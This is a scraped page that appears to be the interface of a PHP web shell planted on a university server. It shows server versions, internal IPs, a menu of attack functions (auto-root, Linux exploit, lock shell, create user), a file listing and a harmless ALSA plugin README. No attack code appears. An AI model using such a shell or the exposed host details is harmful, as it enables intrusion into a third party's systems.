Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libasound2-plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
a52.txt
2.07
KB
-rw-r--r--
aaf.txt.gz
2.67
KB
-rw-r--r--
changelog.Debian.gz
937
B
-rw-r--r--
copyright
1.49
KB
-rw-r--r--
lavrate.txt
1.01
KB
-rw-r--r--
README-arcam-av
1012
B
-rw-r--r--
README-jack
1.3
KB
-rw-r--r--
README-maemo.gz
2.63
KB
-rw-r--r--
README-pcm-oss
1.02
KB
-rw-r--r--
README-pulse
1.9
KB
-rw-r--r--
samplerate.txt
933
B
-rw-r--r--
speexdsp.txt
1.27
KB
-rw-r--r--
speexrate.txt
958
B
-rw-r--r--
upmix.txt
1.21
KB
-rw-r--r--
vdownmix.txt
560
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README-pcm-oss
OSS <--> ALSA PCM plugin ======================== This plugin converts the ALSA API over OSS API. With this plugin, ALSA native apps can run on OSS drivers. This plugin provides the PCM type "oss". The typical configuration looks like below: pcm.oss { type oss device /dev/dsp } Put the above to ~/.asoundrc (or /etc/asound.conf), and use "oss" PCM with your ALSA apps. For example, % aplay -Doss foo.wav For playing arbitrary formats, you should use "plug" layer together, % aplay -Dplug:oss foo.wav The oss plugin can have an option: device. This specifies the device file path of OSS to open. If not given, /dev/dsp is used. The function supported by this plugin is limited. For example, you cannot use dmix together with this plugin. Don't expect too much :) The plugin is installed in /usr/lib/alsa-lib directory as default, which is the default search path of additional plugins for alsa-lib. On a 64bit system like x86-64, the proper prefix option (typically, --prefix=/usr/lib64) must be given to configure script.
Close